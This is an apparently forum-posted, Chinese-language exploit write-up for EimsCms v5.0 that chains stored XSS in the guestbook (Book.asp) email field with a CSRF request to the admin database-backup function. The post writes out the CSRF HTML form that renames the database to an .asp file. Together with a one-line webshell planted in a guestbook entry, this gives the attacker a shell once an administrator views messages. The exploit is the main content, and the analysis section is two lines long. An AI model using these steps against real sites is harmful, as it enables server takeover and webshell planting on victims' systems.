EimsCms v5.0 XSS+CSRF获取Shell方法
<p> 影响版本:EimsCms v5.0</p><p> 官方网站:http://www.eimscms.com/</p>
<p> 漏洞类型:跨站XSS</p>
<p> 漏洞描述:未对Book.asp邮箱等处进行符号转义,导致XSS跨站执行漏洞。</p>
<p> ------GetShell-----</p>
<p> 在Book.asp的邮箱处填写一句话,提交</p>
<p> 在Book.asp的邮箱处填写XSS语句中的CSRF</p>
<p> 等待管理员触发XSS语句,然后一句话连接bem.asp</p>
<p> [要求] 默认后台管理目录/数据库</p>
<p> [注意] 管理触发XSS是在后台查看留言</p>
<p> ------ X S S -----</p>
<p> Book.asp</p>
<p> 在邮箱里处写入XSS语句即可</p>
<p> 用XSS调用CSRF,例如把CSRF去转成JS的则用</p>
<p>
</p>
<p> ----- CSRF -----</p>
<p>
<form action="http://127.0.0.1:99/admin/DataM.asp?eims=Data&Action=bfstart " method="post">
</form>
</p>
<p> <input id="olddata" readonly="readonly" size="45" name="olddata" value="../Data/eimsCMS.mdb" type="text" /></p>
<p> <input id="newdata" size="45" name="newdata" value="../bem.asp" type="text" /></p>
<p> <input id="bem" type="submit" name="Submit" value="开始备份" /></p>
<p> </p>
<p>
</p>
<p> ----- 分析 -----</p>
<p> 未对Book.asp邮箱等处进行符号转义</p>
<p> 未过滤提交语句</p>
頁:
[1]